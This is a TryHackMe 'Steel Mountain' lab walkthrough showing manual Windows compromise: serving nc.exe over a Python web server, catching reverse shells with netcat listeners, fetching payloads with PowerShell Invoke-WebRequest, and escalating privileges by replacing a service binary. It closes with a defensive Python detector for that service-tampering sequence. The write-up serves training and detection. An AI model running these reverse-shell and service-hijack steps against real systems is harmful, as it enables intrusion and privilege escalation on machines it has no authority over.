TryHackMe: Complete Beginner

Steel Mountain

Things got busy yesterday and I had to push finishing this section off a day. The machine’s new IP address is

Access and Escalation Without Metasploit

The alternate exploit we’re going to run for this is located at /usr/share/exploitdb/exploits/windows/remote/ on Kali Linux. To set this up, we’re going to use a quick-n-dirty Python web server containing a statically-compiled version of netcat. This needs to be running on port 80 for the exploit to work (don’t forget to punch a hole through the firewall for this!).

mkdir 1
cd 1
cp /usr/share/windows-binaries/nc.exe .
curl -O
sudo python3 -m http.server 80

Ready our listener in another terminal. Note that WinPEAS generates a lot of output, so we need to increase the tmux history buffer (set -g history-limit 8192) to be able to capture all of it. This needs to be set before creating the window that we’re going to catch our reverse shell in!

nc -lvnp 4444

Copy, setup, and run the exploit!

cp /usr/share/exploitdb/exploits/windows/remote/ .
nano # Change ip_addr and local_port
python2 8080
python2 8080

Once we’re in (the exploit needs to be run twice to work), we need to grab and run winPEASx64.exe from our web server.

powershell -c "Invoke-WebRequest -Uri -OutFile winPEASx64.exe"

Interestingly, while WinPEAS notes that ASCService.exe is vulnerable to an overwrite, it looks like it misses the fact that the compromised user can restart it. That said, WinPEAS does display a lot more information than PowerUp, so it might be useful to run both.

Useful PowerShell commands:

Putting this all together, we can replicate yesterday’s compromise by:

powershell -c "Invoke-WebRequest -Uri -OutFile ASCService.exe"
sc.exe stop AdvancedSystemCareService9
copy "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
copy /Y ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc.exe start AdvancedSystemCareService9

Where ASCService.exe is the same compromise as last time, and we again catch the reverse shell using:

nc -lvnp 4443
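The detection-side view of the stop / overwrite / start sequence above, as an added example that is not part of this write-up: it walks constructed Sysmon-style events (process creation for sc.exe, file creation under Program Files) and flags a single user stopping a service, writing its binary while it is down, and starting the same service again within a short window. The log format, the HOST\lowpriv account and the timestamps are constructed; the service name and binary path are the ones from the room.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)           # stop -> write -> start must fit in here
PROGRAM_FILES = re.compile(r"^c:\\program files( \(x86\))?\\", re.IGNORECASE)
SC_CMD = re.compile(r"\bsc(\.exe)?\s+(stop|start)\s+(\S+)", re.IGNORECASE)

# Constructed sample events: timestamp | Sysmon event id | user | detail
# (EID 1 = process create, detail is the command line; EID 11 = file create, detail is the path)
SAMPLE_EVENTS = r"""
2024-01-01T10:00:00 | 1  | HOST\lowpriv | sc.exe stop AdvancedSystemCareService9
2024-01-01T10:00:05 | 11 | HOST\lowpriv | C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
2024-01-01T10:00:09 | 1  | HOST\lowpriv | sc.exe start AdvancedSystemCareService9
2024-01-01T11:00:00 | 1  | NT AUTHORITY\SYSTEM | sc.exe stop Spooler
2024-01-01T11:00:02 | 1  | NT AUTHORITY\SYSTEM | sc.exe start Spooler
2024-01-01T12:00:00 | 11 | HOST\admin | C:\Program Files\Vendor\updater.exe
"""

def parse(line):
    ts, eid, user, detail = (f.strip() for f in line.split("|", 3))
    return datetime.fromisoformat(ts), int(eid), user, detail

def find_service_tampering(log_text):
    """One alert per user who stops a service, writes under Program Files, then starts it again."""
    stopped = {}   # (user, service) -> time of the sc stop
    written = {}   # (user, service) -> file written after that stop
    alerts = []
    for line in filter(str.strip, log_text.splitlines()):
        ts, eid, user, detail = parse(line)
        if eid == 1:
            m = SC_CMD.search(detail)
            if not m:
                continue
            action, service = m.group(2).lower(), m.group(3)
            key = (user, service)
            if action == "stop":
                stopped[key] = ts
            elif key in written and ts - stopped[key] <= WINDOW:
                alerts.append({"user": user, "service": service, "file": written.pop(key)})
        elif eid == 11 and PROGRAM_FILES.match(detail):
            # Attribute the write to any service this same user stopped recently
            for (u, service), t0 in stopped.items():
                if u == user and ts - t0 <= WINDOW:
                    written[(u, service)] = detail
    return alerts

if __name__ == "__main__":
    for a in find_service_tampering(SAMPLE_EVENTS):
        print(f"ALERT: {a['user']} replaced {a['file']} for service {a['service']}")
```

A non-administrator issuing sc stop/start at all is already worth a rule on its own; the sequence check above just removes the noise from legitimate restarts by SYSTEM or an admin.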